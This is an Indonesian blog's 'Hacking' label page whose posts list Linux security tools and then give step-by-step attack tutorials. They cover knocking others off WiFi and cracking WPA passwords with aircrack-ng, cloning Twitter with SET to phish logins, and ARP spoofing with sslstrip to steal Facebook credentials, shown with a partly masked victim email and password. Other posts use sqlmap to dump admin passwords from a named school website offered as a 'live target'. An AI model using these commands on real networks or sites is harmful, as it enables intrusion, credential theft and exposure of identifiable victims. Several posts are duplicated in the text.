Tampilkan postingan dengan label Hacking. Tampilkan semua postingan
Tampilkan postingan dengan label Hacking. Tampilkan semua postingan
Sabtu, 05 Oktober 2013
Hacking Tools di Linux
Wireshark – Network Traffic Analyzer
Wireshark adalah tools untuk menganalisis lalu lintas paket data di jaringan. Lazim dipanggil sebagi SNIFFER (pengintai). Sniffer adalah tools yang berkemampuan menangkap paket data dalam jaringan Wireshark mampu mendecode paket data dalam banyak jenis protokol. Tersedia pada operasi sistem linux dan windows.
#sudo aptitude install wireshark
Nessus – Remote Network Security Auditor
Nessus adalah scanner untuk mengetahui celah keamanan komputer, baik komputer anda atau komputer siapapun. Kemampuannya yang lengkap sebagai Vulnerability Scanner adalah nyata karena didukung dengan fitur high speed discovery, configuration auditing, asset profiling, sensitive data discovery, dan vulnerability analysis of our security posture.
#sudo apt-get install nessus
NMAP – The Network Mapper
Adalah tools pemetaan jaringan (network) terbaik yang pernah ada sejauh ini. Panggunaannya yang praktis, konfigurasi yang mudah, dan kehandalannya dalam memetakan jaringan komputer di manapun. Dengan Nmap, anda dapat mengetahui komputer-komputer (hosts) apa saja yang sedang terhubung dalam sebuah jaringan, apa service (aplikasi) yang sedang dijalankan komputer itu (host), apa sistem operasi komputer yang dipakai, apa tipe firewall yang digunakan, dan karakteristik lainnya dari komputer.
#sudo apt-get install nmap
Etherape – Graphical Network Monitor Modeled after Etherman
Etherape adalah tools untuk memonitor jaringan dengan tampilan grafis. Tools ini dilengkapi dengan kemampuan menghasilkan grafik dari lapisan jaringan, mode IP dan TCP, serta menampilkan kegiatan network (jaringan) secara grafis. Kita dapat memfilter traffic apa saja yang mau ditampilkan secara grafis.
#sudo apt-get install etherape
Kismet
Siapa yang tak kenal tools ini? Sebuah tools terbaik dan satu-satunya di dunia yang mampu mendeteksi setiap jaringan (network) wireless dengan sempurna tanpa cacat sekalipun jaringan tersebut telah berusaha disembunyikan. Dengan tools standar, kita kadang terkecoh bahwa ternyata ada jaringan yang tetap ada namun tak terpantau oleh komputer kita. Kismet adalah detektor jaringan wireless, sniffer, dan sistem pendeteksi penyusup pada komputer. Kismet dapat bekerja pada beragam tipe wireless card, dengan syarat wireless card kita memiliki fitur MODE MONITOR. Kismet dapat melakukan sniffing pada traffic-traffic 802.11b, 802.11a, dan 802.11g.
#sudo apt-get install kismet
Chkrootkit – Checks for signs of rootkits on the local system
Tools ini berfungsi melakukan identifikasi apakah sebuah komputer diinfeksi dengan rootkit. Apa itu tootkit? Ini dia jenis-jenis rootkit:
1. lrk3, lrk4, lrk5, lrk6 (and some variants);
2. Solaris rootkit;
3. FreeBSD rootkit;
4. t0rn (including latest variant);
5. Ambient’s Rootkit for Linux (ARK);
6. Ramen Worm;
7. rh[67]-shaper;
8. RSHA;
9. Romanian rootkit;
10. RK17;
11. Lion Worm;
12. Adore Worm.
#sudo apt-get install chkrootkit
Rkhunter – Rootkit, backdoor, sniffer and exploit scanner
Tools ini sangat berguna dalam melakukan scanning system komputer kita terhadap keberadaan rootkit yang teridentifikasi berbahaya atau sangat mencurigakan, backdoors, sniffers, dan exploits.
Tools ini akan melakukan pemeriksaan berikut ini di komputer kita:
- MD5 hash changes;
- files commonly created by rootkits;
- executables with anomalous file permissions;
- suspicious strings in kernel modules;
- hidden files in system directories;
Dalam upaya scanning sistem yang optimal, anda harus mengecek sistem menggunakan RKHUNTER dan CHKROOTKIT.
#sudo apt-get install rkhunter
TCPDump – A powerful tool for network monitoring and data acquisition
Tools ini mengizinkan anda untuk melakukan dumping terhadap lalu lintas jaringan kompute. TCPDump juga dapat digunakan untuk menguji IPv4, ICMPv4, IPv6, ICMPv6, UDP, TCP, SNMP, AFS BGP, RIP, PIM, DVMRP, IGMP, SMB, OSPF, NFS, dan banyak tipe paket data di jaringan. Selain itu, anda juga dapat menggunakan tools ini untuk melakukan track down masalah network, mendeteksi “Ping Attacks”, dan memonitor kegiatan network.
#sudo apt-get install tcpdump
SNORT – Flexible Network Intrusion Detection System
Ini adalah salah satu tools favorit saya dalam mendeteksi penyusup di jaringan. Kemampuan tools ini adalah yang tercanggih dalam mendeteksi attacks dan probes dalam network, seperti buffer overflows, stealth port scans, CGI attacks, SMB probes, dan lain-lain.
#sudo apt-get install snort
Firestarter – program for managing and observing your firewall
Firestarter adalah tools lengkap mesin Linux yang berfungsi sebagai firewall. Memiliki kemampuan real-time dalam menunjukkan probing penyerang pada mesin komputer.
#sudo apt-get install firestarter
CLAMAV – anti-virus utility for Unix
Clam antivirus adalah antivirus yang didesain untuk mesin Linux. Antivirus ini berkemampuan melakukan scanning pada:
- format Zip, RAR, Tar, Gzip, Bzip2, OLE2, Cabinet, CHM, BinHex, SIS, dan sebagainya
- seluruh format file mail
- seluruh format file dokument, termasuk file Microsoft Office dan file Mac Office seperti HTML, RTF dan PDF.
#sudo apt-get install clamav
Netcat – TCP/IP swiss army knife
Netcat adalah sebuah tools simpel dari mesin linux yang berkemampuan membaca dan menuliskan paket-paket data di jaringan, baik yang berprotokol TCP maupun UDP.
#sudo apt-get install netcat
John
Lebih terkenal dengan sebutan John the Ripper (JTR), adalah tools yang didesain untuk membantu administrator sistem dalam menemukan kelemahan password. Tools ini mampu digunakan dalam berbagai bentuk chipertext, termasuk Unix’s DES and MD5, Kerberos AFS passwords, Windows’ LM hashes, BSDI’s extended DES, dan OpenBSD’s Blowfish.
Bagi yang ingin melakukan cracking terhadap sebuah password, John the Ripper adalah jawaban terbaik.
#sudo apt-get install john
Dnsniff – Various tools to sniff network traffic for cleartext insecurities
Dsniff adalah sebuah paket tools yang mengandung beberapa sub-tools di dalamnya untuk menyadap dan mengkreasikan jaringan.
Sub-sub tools itu adalah berikuti ini:
* arpspoof – Send out unrequested (and possibly forged) arp replies.
* dnsspoof – forge replies to arbitrary DNS address / pointer queries on the Local Area Network.
* dsniff – password sniffer for several protocols.
* filesnarf – saves selected files sniffed from NFS traffic.
* macof – flood the local network with random MAC addresses.
* mailsnarf – sniffs mail on the LAN and stores it in mbox format.
* msgsnarf – record selected messages from different Instant Messengers.
* sshmitm – SSH monkey-in-the-middle. proxies and sniffs SSH traffic.
* sshow – SSH traffic analyser.
* tcpkill – kills specified in-progress TCP connections.
* tcpnice – slow down specified TCP connections via “active” traffic shaping.
* urlsnarf – output selected URLs sniffed from HTTP traffic in CLF.
* webmitm – HTTP / HTTPS monkey-in-the-middle. transparently proxies.
* webspy – sends URLs sniffed from a client to your local browser (requires libx11-6 installed).
#sudo apt-get install dsniff
Jumat, 06 September 2013
7 Tipe Hacker Yang Patut Diwaspadai
Berbagai tipe hacker bersliweran di dunia maya. Bila anda tidak ingin menjadi korbannya, salah satu langkah yang bisa Anda ambil ialah dengan mengenali jenis, motivasi dan objek dari hacker-hacker tersebut. Berikut daftar tipe-tipe hacker yang bisa anda cermati :
1. Cyber Criminal
Terdiri dari kelompok besar hacker jahat yang memakai malware (program jahat) untuk mencuri uang korbannya. Berbagai cara mereka lakukan untuk mencapai gol itu seperti memanipulasi akun bank, memakai nomor kartu kredit si korban, memalsukan program antivirus atau dengan mencuri identitas termasuk password mangsanya.
2. Spammer dan penyebar adware
Penyetor spam dan adware menjala uang melalui iklan ilegal, entah karena dibayar oleh perusahaan tertentu atau karena mereka melakukannya untuk menjual produk mereka sendiri. Contoh: ‘Cheap viagra, anyone?’.
3. Advanced persistent threat (APT) agent
Tidak seperti cyber criminal, APT agents biasanya sangat terorganisir, terdiri dari grup-grup yang berduit dan memiliki tujuan jangka panjang. Tujuan mereka ialah mencuri properti intelektual sebuah perusahaan alih-alih mendapatkan uang dengan cara cepat. Mereka menjiplak ide dan produk perusahaan lain untuk direalisasikan di wilayah mereka, atau menjual informasi yang mereka dapat ke pelelang tertinggi.
4. Mata-mata perusahaan
Mirip dengan APT agents, bedanya ialah mereka biasanya tidak terorganisir. Mata-mata perusahaan berusaha untuk mencuri informasi apapun yang terkait perusahaan pesaing.
5. Hacktivist
Hacker tipe ini melancarkan aksinya dengan latar belakang politik, agama, lingkungan hingga keyakinan. Biasanya mereka mempermalukan lawannya atau mengobrak-abrik situs mereka.
6. Cyber warriors
Cyber warrior berperan dalam perang cyber di mana suatu wilayah suatu negara melawan wilayah negara lain dengan tujuan akhir melumpuhkan kemampuan militer lawan.
7. Rogue hacker
Tipe terakhir dalam daftar ini ialah rogue hacker. Mereka melakukan aksi hacking hanya untuk membuktikan skill mereka, menyombongkan diri ke teman atau hanya karena merasa tertantang dalam melakukan aksi ilegal. Aksi mereka memang mengganggu namun mereka tidak mengobrak-abrik internet atau bisnis orang lain.
Cara Mengetahui IP Address Komputer Orang Lain
Kali ini saya akan membahas secara lengkap Cara Mengetahui IP Address Komputer Orang Lain. Yap.. Melacak Ip Address Komputer Orang ini sangatlah dicari-cari oleh orang sedunia. Maka dari itu saya akan membahas secara detail. Langsung aja ke TKP.
Disini akan dibahas :
1. Melacak alamat IP suatu situs
2. Melacak Real Adress server suatu situs
3. Cara Mengetahui IP address lawan chatting kita
-== Pembahasan ===-
1. Melacak alamat IP suatu situs Untuk mengetahui alamat IP suatu situs, kita dapat melakukan PING terhadap situs tersebut. Caranya: Masuk ke command Prompt dan ketikan PING WWW.SITUSYANGDILACAK.COM lalu tekan enter. Maka akan muncul alamat Ip situs tersebut.
2. Melacak Lokasi server (real address) suatu situs Kita dapat melacak lokasi server suatu situs hanya dengan mengetahui alamat situsnya saja. Coba anda buka http://www.domainwhitepages.com Tinggal masukkan IP address situs tadi atau masukkan alamat situsnya dan anda akan mendapatkan info lengkap tentang server dari situs tersebut diantaranya adalah lokasi negara dan kota.
3. Melacak IP address lawan chatting kita Saat kita menggunakan Yahoo messenger, sebenarnya kita bisa mengetahui alamat IP dari lawan chatting kita. Caranya: Kirimkan suatu file pada lawan chat kita. :: Lalu masuklah ke Command Prompt (MSDOS) dan ketikkan NETSTAT -N lalu tekan enter, maka alamat IP lawan chatting anda (yang telah anda kirimi file tadi) akan muncul beserta port yang digunakan untuk pengiriman file. :: Untuk mengetahui lokasi lawan chatting anda (real address) seperti ia berada di kampus atau di warnet mana, tinggal anda chek di http://www.domainwhitepages.com dengan mempergunakan alamat IP yang anda dapatkan.
Rabu, 24 Juli 2013
Memutuskan Jaringan Wifi Orang Lain dengan Backtrack
Saya kesal jika sementara asik online, tiba-tiba lambat. Untung saya pengguna backtrack.
Perhatikan langkah saya dalam memutuskan jaringan wifi orang lain menggunakan Backtrack
1. Buka terminal lalu ketikkan ifconfig untuk memeriksa interface anda
wlan0 adalah nama default pada Backtrack.
wlan0 adalah nama default pada Backtrack.
2. Aktifkan mode monitor dengan perintah :
airmon-ng start wlan0
3. Mode monitor aktif. Untuk scanning korban, masukkan perintah :
airodump-ng mon0
airodump-ng mon0
ctrl+C untuk menghentikan scanning. Tentukan target (Ex:70:f1:a1:b2:72:77)
4.Langkah memutuskan jaringan korban, masukkan perintah berikut
aireplay-ng -0 jumlahpaket -a BSSID -c Macadresskorban mon0
Jumlah paket : lamanya pemutusan jaringan tergantung banyaknya pket
untuk BSSID
aireplay-ng -0 jumlahpaket -a BSSID -c Macadresskorban mon0
Jumlah paket : lamanya pemutusan jaringan tergantung banyaknya pket
untuk BSSID
Contoh : (aireplay-ng -0 500 -a 11:22:33:44:55:66 -c 70:f1:a1:b2:72:77 mon0)
Proses berhasil jika tampak seperti dibawah ini
Cara Mudah Deface Website dengan Javascript
Kali ini saya akan membahas tentang Deface Website. Oke kita Mulai saja
1. Buka website sasaran.
2. Jika loading sudah selesai, Silahkan lakukan aksi langkah yang ketiga
3. Copy Paste kode berikut ini di adress bar website tersebut.
javascript:document.body.contenEditable='true'; document.designMode='on'; void 0
4. Kemudian coba kalian hapus salah satu huruf di website tersebut
1. Buka website sasaran.
2. Jika loading sudah selesai, Silahkan lakukan aksi langkah yang ketiga
3. Copy Paste kode berikut ini di adress bar website tersebut.
javascript:document.body.contenEditable='true'; document.designMode='on'; void 0
4. Kemudian coba kalian hapus salah satu huruf di website tersebut
Just For Studying, Keep Testing
Senin, 22 Juli 2013
Tutorial Hacking Twitter Dengan Backtrack
Kita akan bahas dan belajar tentang hacking twitter (sebenrnya bisa buat semua website) dengan menggunakan fake login dan aplikasi SET (Social Engineering Tools).
Kita bahas step by step :
1. Setting IP eth0 sesuai yang anda inginkan, saya disini menggunakan IP 192.168.1.100
ketik : ifconfig 192.168.1.100
Cek dulu apakah IP eth0 kita sesuai yang kita ketik "192.168.1.100"
ketik : airmon-ng
Lihat baris eth0 apakah terdapat 192.168.1.100. Kalau ada, lanjut ke langkah selanjutnya.
2. Buka SET pada backtrack terdapat pada Application>>Backtrack>>Exploitation Tools>>Social Engineering tools>>Social Engineering Toolkit>>SET
Setelah terbuka, ada option yang tertera dari 1 sampai 7 dan 99. Ikutin langkah ini :
Pilih: 1 (Social-Engineering Attacks) [enter]
Pilih: 2 (WebSite Attack Vector) [enter]
Pilih: 6 (Web Jacking Attack Method) [enter]
Pilih: 2 (Site Cloner) [enter]
Lalu kita diminta memasukan IP, masukan IP yang telah kita buat, 192.168.1.100 [enter]
Lalu kita diminta memasukan website yang ingin kita cloning, http://www.twitter.com [enter]
Persiapan sudah siap. Ingat.. jangan di tutup terminalnya !
Sesudah itu anda buka browser dan masukan url : 192.168.1.100/index2.html
Nb: Selalu tambahkan /index2.html di belakang IP kita pada kotak url di browser
Lalu masukan user/email dan password seperti di bawah ini, dan anda bisa menggunakan goo.gl atau adf.ly sebagai url shorter asli kita
Setelah victim (target) memasukan user dan passwordnya dan login, maka user dan passwordnya akan tertera pada terminal kita tadi
kelemahan menggunakan trick ini :
- Target yang waspada..akan melihat keanehan pada linknya..address seperi itu akan mencurigakan,jadi anda harus men-shorturl link anda.. (192.168.1.100/index2.html),kecuali anda bisa mengubah ip address suatu website dalam komputer target dan target jadi salah menghubungi website,suatu saat akan saya berikan tutorialnya
- Trick ini berbeda dengan trick fake login biasanya,trick ini hanya bisa dilakukan selama terminal anda yang menjalankan SET masih aktif,jika di close atau komputer anda mati user dan passwordnya tidak bisa tertera dalam terminal,dan url/link yg kita buat jadi tidak valid lagi..tapi biasanya mreka para attacker yg membuat fake login dengan meretas website orang dan menginject file php dan file html login facebook pada server dan menyebarkan link tersebut dan setiap orang login akan masuk ke file php yang dibuat sebelumnya dan dapat di baca sewaktu-waktu
Good Luck, Keep Trying :)
Senin, 15 Juli 2013
Cara Mendapatkan Password WiFi dengan Backtrack 5
Kali ini saya akan berbagi sedikit tentang bagaimana Cara Mendapatkan Password Wifi Menggunakan BackTrack 5
Tutorial ini dibuat di OS Back|Track 5 32 GNOME, dan juga bisa berjalan pada OS berbasis UNIX lainnya.
Persiapan :
1. Aircrack
2. Dictionary attack
Langkah - Langkah :
1. Hentikan semua proses yang menghambat jalannya aireplay
2. Simpan hasil monitoring
3. Lakukan aireplay untuk mendapatkan WPA Handshake
4. Crack hasil rekaman dengan dictionary attack
5. Gameover
1. Hentikan semua proses yang menghambat jalannya aireplay
#airmon-ng check kill
2. Buat interface baru dengan mode monitor menggunakan airmon-ng
#airmon-ng start wlan0
3. Monitoring setiap akses poin yang ada di sekitar attacker
#airodump-ng mon0
4. Pilih target, kemudian Monitoring dan simpan hasil monitoring airodump
#airmon-ng --write output --channel 6 --bssid 58:6D:8F:3D:55:E8 mon0
Keterangan :
1. --write : berfungsi untuk menyimpan hasil monitoring
2. output : nama hasil monitoring yang di simpan [bisa diisi bebas]
3. --chanel : channel akses poin target
4. --bssid : mac address akses poin
5. Jalankan aireplay-ng untuk mendapatkan WPA Handshake
#aireplay-ng --deauth 1 -a 58:6D:8F:3D:55:E8 -c E0:B9:A5:9D:18:94 mon0
Keterangan :
1. --deauth : berfungsi untuk deautentikasi setiap stasiun pada akses sebuah jaringan
2. -a : mac address akses poin
3. -c : mac address klien
Note :
Jika belum muncul WPA handshake, ganti mac address klien dengan yang lain.
#aireplay-ng --deauth 1 -a 58:6D:8F:3D:55:E8 -c 58:6D:8F:3D:55:E8 mon0
6. Jika sudah mendapatkan WPA handshake dari klien, langkah selanjutnya adalah menghentikan proses airodump-ng dengan menekan tombol ctrl + c, dan cracking password dengan aircrack-ng
#aircrack-ng output-01.cap -w /root/crack wpa.txt
Keterangan :
1. output-01.cap harus disesuaikan dengan nama hasil monitoring yang anda kehendaki pada tahap 4
2. -w adalah metode dictionary, diikuti dengan direktori dictionary milik anda.
7. Langkah selanjutnya adalah mengetes kebenaran dari metode ini
Oke, Sekian Sedikit Penjelasan dari saya, Semoga bermanfaat dan ingat, jangan salah gunakan untuk hal yang tidak penting, hehehe..
Tutorial ini dibuat di OS Back|Track 5 32 GNOME, dan juga bisa berjalan pada OS berbasis UNIX lainnya.
Persiapan :
1. Aircrack
2. Dictionary attack
1. Hentikan semua proses yang menghambat jalannya aireplay
2. Simpan hasil monitoring
3. Lakukan aireplay untuk mendapatkan WPA Handshake
4. Crack hasil rekaman dengan dictionary attack
5. Gameover
1. Hentikan semua proses yang menghambat jalannya aireplay
#airmon-ng check kill
2. Buat interface baru dengan mode monitor menggunakan airmon-ng
#airmon-ng start wlan0
3. Monitoring setiap akses poin yang ada di sekitar attacker
#airodump-ng mon0
4. Pilih target, kemudian Monitoring dan simpan hasil monitoring airodump
#airmon-ng --write output --channel 6 --bssid 58:6D:8F:3D:55:E8 mon0
Keterangan :
1. --write : berfungsi untuk menyimpan hasil monitoring
2. output : nama hasil monitoring yang di simpan [bisa diisi bebas]
3. --chanel : channel akses poin target
4. --bssid : mac address akses poin
#aireplay-ng --deauth 1 -a 58:6D:8F:3D:55:E8 -c E0:B9:A5:9D:18:94 mon0
Keterangan :
1. --deauth : berfungsi untuk deautentikasi setiap stasiun pada akses sebuah jaringan
2. -a : mac address akses poin
3. -c : mac address klien
Note :
Jika belum muncul WPA handshake, ganti mac address klien dengan yang lain.
#aireplay-ng --deauth 1 -a 58:6D:8F:3D:55:E8 -c 58:6D:8F:3D:55:E8 mon0
6. Jika sudah mendapatkan WPA handshake dari klien, langkah selanjutnya adalah menghentikan proses airodump-ng dengan menekan tombol ctrl + c, dan cracking password dengan aircrack-ng
#aircrack-ng output-01.cap -w /root/crack wpa.txt
Keterangan :
1. output-01.cap harus disesuaikan dengan nama hasil monitoring yang anda kehendaki pada tahap 4
2. -w adalah metode dictionary, diikuti dengan direktori dictionary milik anda.
7. Langkah selanjutnya adalah mengetes kebenaran dari metode ini
Oke, Sekian Sedikit Penjelasan dari saya, Semoga bermanfaat dan ingat, jangan salah gunakan untuk hal yang tidak penting, hehehe..
Jumat, 28 Juni 2013
Sql Injection Menggunakan Sqlmap
ok langsung saja, tidak perlu banyak basa-basi lagi.
Cari target menggunakan google dorks:
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
dan masih banyak lagi yang lainnya. Jika target sudah di temukan, buka sqlmap, lokasinya di:
Application – Backtrack – Exploitation Tools – Web Exploitation Tools – Sqlmap
Pentest target menggunakan cara berikut:
python sqlmap.py -u http://www.dedetampan.com/catalog.php?id=129 --dbs
-u = url
--dbs = untuk mencari database
Output:
available databases [2]:
[*] dede
[*] information_schema
Jika sudah menemukan databasenya, lanjut dengan cara berikut:
python sqlmap.py -u http://www.dedetampan.com/catalog.php?id=129 -D dede --tables
-D = nama database yang kita temukan tadi
--tables = mencari nama tables
Output:
Database: dede
[3 tables]
+------------------------------+
| access_log |
| administrators |
| menus |
Jika sudah menemukan nama tables, lanjut dengan cara berikut:
python sqlmap.py -u http://www.dedetampan.com/catalog.php?id=129 -D dede -T administrators --columns
-T = nama tables
--columns = mencari nama columns
Output:
[2 columns]
+--------------+--------------+
| Column | Type |
+--------------+--------------+
| admin_login | text |
| admin_passwd | text |
Jika sudah menemukan nama columns, lanjut dengan cara berikut:
python sqlmap.py -u http://www.dedetampan.com/catalog.php?id=129 -D dede -T administrators -C admin_login --dump
Output:
+--+
| admin-login |
+--+
|dedetampan|
Jika sudah mendapatkan nama username, lanjut dengan mencari password dari username tersebut:
python sqlmap.py -u http://www.dedetampan.com/catalog.php?id=129 -D dede -T administrators -C admin_passwd --dump
Output:
+--+
| admin-passwd |
+--+
|tb-cyber|
nah kalau sudah begini, sekarang terserah kalian mau di buat apa website tersebut ^_^
Sumber : http://dedekpli.blogspot.com/2011/11/sql-injection-with-sqlmap.html
Kamis, 27 Juni 2013
Hacking Facebook Dengan Backtrack 5 R3
Kali ini gw akan berbagi trick yaitu seperti judul yang telah disebutkan "Cara Hacking Facebook Menggunakan Backtrack 5 r3 . apa itu Backtrack? backtrack yaitu sebuah sistem operasi LINUX. oke dari pada penasaran pengen tau lebih jelasnya mari di simak dan di perhatikan betul perintah-perintahnya :
mula - mula anda masuk terminal, terus kalo udah masuk kita masuk ke root dulu dengan memberikan perintah ini sudo su-
Pertama-tama siapkan tool yang akan kita gunakan
- Arpspoof
- Sslstrip-0.9
- OS Linux 32 Bit
Setelah semua tool yang di butuhkan sudah tersedia lakukan langkah berikut (jika paket belum terinstal) :
1) Buka Terminal kemudian ketikkan : wget http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.9.tar.gz
2) Kemudian extract file dengan cara : tar zxvf sslstrip-0.9.tar.gz
3) Ok sekarang kita masuk ke dalam folder baru dari file yang telah kita extract tadi : cd sslstrip-0.9
4) Dan untuk menginstal ketikkan : python setup.py install
Lakukan langkah berikut ( Jika paket sudah terinstall )
Gunakan cara ini setiap kali jika ingin mencuri password lagi:
1) Pertama hidupkan terlebih dahulu port untuk memforward : echo ’1′ > /proc/sys/net/ipv4/ip_forward
2) Kemudian cari gateway atau pintu dari jaringan yang akan kita sadap dengan cara : netstat -nr
3) sekarang kita reset port http ke port 8080, ketikan : iptables -t nat -A PREROUTING -p tcp -
destination-port 80 -j REDIRECT --to-port 8080
4) Mulai menyadap dengn cara : arpspoof -i wlan0 192.168.0.1 ( 192.168.0.1) adalah gateway dari
jaringan yang saya gunakan, gantilah gateway tersebut dengan gateway yang anda temukan dari
netstat -nr tadi)
5) Kemudian buka terminal baru lalu ketikkan : sslstrip -l 8080 untuk mengaktifkan cookies yang akan
kita baca
6) Set up is complete!! Ok sekarang kita telah menyadap akses jaringan yang melewati gateway.
7) jika anda ingin melihat akses kemana sajakah itu gunakan perintah : tail -f sslstrip.log
8) dan saat ada seseorang melakuakn login entah facebook yahoo gmail atau apapun yang
menggunakan username dan password. kita akan mengetahuinya.
karena akan memakan waktu yang cukup lama karena harus menunggu ada seseorang yang mlakukan login jadi kita harus bersabar. dan itupun akan muncul script yang cukup banyak. gunakan perintah
find "pass: (tanpa petik) agar kita lebih mudah menemukannya
HANYA UNTUK PENGETAHUAN, JANGAN DI SALAH GUNAKAN YA !
Nah ini dia contoh saat Scanning: Social Enginering Toolkit (SET)
root@bt:~# ettercap -T -q -i eth0
ettercap NG-0.7.3 copyright @2013 Neyfa Kamila
Listening on eth0... (Ethernet)
eth0 -> 00:1E:68:2E:73:4A 1.0.0.64 255.255.255.0
Privileges dropped to UID 65534 GID 65534...
12 plugins
39 protocol dissectors
33 ports monitored
7587 mac vendor fingerprint
1990 tcp OS fingerprint
2633 known services
Starting Unified sniffing...
Text only Interface activated...
Hit 'h' for inline help
HTTP : 69.63.180.174:80 -> USER: martin.alfath@yahoo.com
PASS: c****g
INFO: http://www.facebook.com/
Dan ini Salah 1 Akun Facebook yg berhasil Gw Jebol ..
Email: martin.alfath@yahoo.com
Password: c****g
Sengaja Sebagian Password Gw pake bintang..
agar tidak ada Pencurian..
Kalo Mau Liat Buktinya.. Buka Facebook kalian
trus Copas emailnya di Kotak Pencari Facebook..
klik Profile'a, lalu lihat status terbarunya ^_^
Atau Bisa Klik Link Yg Menuju Profil'a disini:
http://www.facebook.com/fadlhana
Sumber : http://nemi.faa.im/hacking-facebook-dengan-backtrack-5-r3.xhtml
Cara Deface Website Sekolah Dengan SQL Map
Halo para sobat Hackinggroups, kali ini saya akan menulis tentang Cara Deface Dengan SQL Injection yang dikenal dengan teknik SQLmap di BackTrack. Tools ini sudah ada di dalam File .ISO pada BackTrack. Disini, saya menggunakan BackTrack 5 R3.
Pertama-tama, cari target yang vuln terhadap SQL Injection, berikut ini sedikit dork dari saya :
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:Pageid=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
Dan masih banyak lagi dork bertebaran di Google. Dalam Tutorial kali ini, saya akan menggunakan target salah satu Sekolah yang ada di Sidoarjo.
http://www.sman2sidoarjo.sch.id/
Untuk mengetahui Website tersebut Vuln atau tidak, silahkan tambahkan tanda ‘ (petik satu) setelah atau sebelum nomor id tersebut, bisa juga dengan menambahkan tanda - (minus) sebelum nomor id tersebut.
Contoh :
http://www.sman2sidoarjo.sch.id/beritaLengkap.php?id=5''
http://www.sman2sidoarjo.sch.id/beritaLengkap.php?id=’5
http://www.sman2sidoarjo.sch.id/beritaLengkap.php?id=-5
Jika target tersebut Vuln terhadap SQLi, maka akan muncul kira-kira seperti ini :
Jika sudah mendapatkan target, silahkan buka Terminal, kemudian ketikan perintah
“cd /pentest/database/sqlmap” (tanpa tanda petik) kemudian Enter.
Kemudian akan muncul seperti ini.
Kemudian untuk mencari nama database, ketikkan
“ ./sqlmap.py -u http://www.sman2sidoarjo.sch.id/beritaLengkap.php?id=5 --dbs”
(tanpa tanda petik) kemudian Enter.
Kemudian akan muncul seperti ini :
Setelah itu akan muncul beberapa Tabel.
Kemudian kita mencari Colums dengan cara mengetik “./sqlmap.py -u http://www.sman2sidoarjo.sch.id/beritaLengkap.php?id=5 -D namadatabase -T namatable --columns” (tanpa tanda petik) kemudian Enter.
Kemudian, untuk mengetahui isi dari Columns tersebut, kita ketikkan “./sqlmap.py -u http://www.sman2sidoarjo.sch.id/beritaLengkap.php?id=5 -D namadatabase -T namatable --dump” (tanpa tanda petik) kemudian Enter.
Nah, kita sekarang sudah menemukan User + Pass Administrator dari Website tersebut :D
Jika sudah mendapatkan User + Pass, pasti Anda tau kan yang harus dilakukan ?
Nah, tinggal cari Login Adminnya deh
Caranya banyak kok di Google
Sekian dulu dari saya, saya ucapkan Terimakasih Banyak :)
Untuk yang ingin belajar SQL Map, silahkan menggunakan live target http://www.sman2sidoarjo.sch.id/beritaLengkap.php?id=5
Pertama-tama, cari target yang vuln terhadap SQL Injection, berikut ini sedikit dork dari saya :
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:Pageid=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
Dan masih banyak lagi dork bertebaran di Google. Dalam Tutorial kali ini, saya akan menggunakan target salah satu Sekolah yang ada di Sidoarjo.
http://www.sman2sidoarjo.sch.id/
Untuk mengetahui Website tersebut Vuln atau tidak, silahkan tambahkan tanda ‘ (petik satu) setelah atau sebelum nomor id tersebut, bisa juga dengan menambahkan tanda - (minus) sebelum nomor id tersebut.
Contoh :
http://www.sman2sidoarjo.sch.id/beritaLengkap.php?id=5''
http://www.sman2sidoarjo.sch.id/beritaLengkap.php?id=’5
http://www.sman2sidoarjo.sch.id/beritaLengkap.php?id=-5
Jika target tersebut Vuln terhadap SQLi, maka akan muncul kira-kira seperti ini :
Jika sudah mendapatkan target, silahkan buka Terminal, kemudian ketikan perintah
“cd /pentest/database/sqlmap” (tanpa tanda petik) kemudian Enter.
Kemudian akan muncul seperti ini.
Kemudian untuk mencari nama database, ketikkan
“ ./sqlmap.py -u http://www.sman2sidoarjo.sch.id/beritaLengkap.php?id=5 --dbs”
(tanpa tanda petik) kemudian Enter.
Kemudian akan muncul seperti ini :
Disana kita dapat menemukan 2 Database, yaitu information_schema dan sman2sidoarjo_sman2sda
Setelah kita mendapatkan Database tersebut, kita tulis “./sqlmap.py -u http://www.sman2sidoarjo.sch.id/beritaLengkap.php?id=5 -D namadatabase --tables” (tanpa tanda petik) kemudian Enter.Setelah itu akan muncul beberapa Tabel.
Kemudian kita mencari Colums dengan cara mengetik “./sqlmap.py -u http://www.sman2sidoarjo.sch.id/beritaLengkap.php?id=5 -D namadatabase -T namatable --columns” (tanpa tanda petik) kemudian Enter.
Kemudian, untuk mengetahui isi dari Columns tersebut, kita ketikkan “./sqlmap.py -u http://www.sman2sidoarjo.sch.id/beritaLengkap.php?id=5 -D namadatabase -T namatable --dump” (tanpa tanda petik) kemudian Enter.
Nah, kita sekarang sudah menemukan User + Pass Administrator dari Website tersebut :D
Jika sudah mendapatkan User + Pass, pasti Anda tau kan yang harus dilakukan ?
Nah, tinggal cari Login Adminnya deh
Caranya banyak kok di Google
Sekian dulu dari saya, saya ucapkan Terimakasih Banyak :)
Untuk yang ingin belajar SQL Map, silahkan menggunakan live target http://www.sman2sidoarjo.sch.id/beritaLengkap.php?id=5
Langganan:
Postingan (Atom)



















